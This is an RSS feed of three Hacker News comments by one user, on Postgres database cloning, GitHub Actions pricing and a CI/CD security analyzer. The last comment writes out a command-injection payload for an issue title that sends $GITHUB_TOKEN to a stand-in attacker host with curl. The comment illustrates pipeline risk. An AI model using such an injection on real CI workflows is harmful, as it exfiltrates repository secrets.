<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Hacker News: eugercek</title><link>https://news.ycombinator.com/user?id=eugercek</link><description>Hacker News RSS</description><docs>https://hnrss.org/</docs><generator>hnrss v2.1.1</generator><lastBuildDate>Thu, 14 May 2026 15:07:27 +0000</lastBuildDate><atom:link href="https://hnrss.org/user?id=eugercek" rel="self" type="application/rss+xml"></atom:link><item><title><![CDATA[New comment by eugercek in "Launch HN: Ardent (YC P26) – Postgres sandboxes in seconds with zero migration"]]></title><description><![CDATA[
<p>If you use xfs (+`file_copy_method=CLONE`) you can do this with Postgres 18.<p>`CREATE DATABASE clankerdb TEMPLATE sourcedb STRATEGY=FILE_COPY;`.<p>But Ardent can be useful for many, because cloud providers uses heavily restricted Postgres. And many use Aurora, which doesn't event let configure the `log_line_prefix`.<p>Though if cloud providers add file_copy_method=CLONE compatible managed pg ...<p>ref: <a href="https://boringsql.com/posts/instant-database-clones/" rel="nofollow">https://boringsql.com/posts/instant-database-clones/</a></p>
]]></description><pubDate>Wed, 13 May 2026 18:12:51 +0000</pubDate><link>https://news.ycombinator.com/item?id=48125419</link><dc:creator>eugercek</dc:creator><comments>https://news.ycombinator.com/item?id=48125419</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=48125419</guid></item><item><title><![CDATA[New comment by eugercek in "Pricing Changes for GitHub Actions"]]></title><description><![CDATA[
<p>Companies like Ubicloud gives hosted actions faster and far more cheaper (5-10x) than Microsoft itself.<p>Now Microsoft will charge "data plane usage" (CRUDing a row that contains (id, ts, state_enum, acc_id ...) in essence) 2.5 more than what Ubicloud offers for WHOLE compute. Also to have "fair pricing" they'll make you pay 2.5 more the compute's price for being able to use their data plane.<p>cool.</p>
]]></description><pubDate>Tue, 16 Dec 2025 20:41:35 +0000</pubDate><link>https://news.ycombinator.com/item?id=46294130</link><dc:creator>eugercek</dc:creator><comments>https://news.ycombinator.com/item?id=46294130</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46294130</guid></item><item><title><![CDATA[New comment by eugercek in "Raven – CI/CD Security Analyzer"]]></title><description><![CDATA[
<p>`new issue title" && curl hacker.boi -d $GITHUB_TOKEN && sleep 30` I hate pipelines even more :(</p>
]]></description><pubDate>Tue, 31 Oct 2023 22:30:51 +0000</pubDate><link>https://news.ycombinator.com/item?id=38092288</link><dc:creator>eugercek</dc:creator><comments>https://news.ycombinator.com/item?id=38092288</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=38092288</guid></item></channel></rss>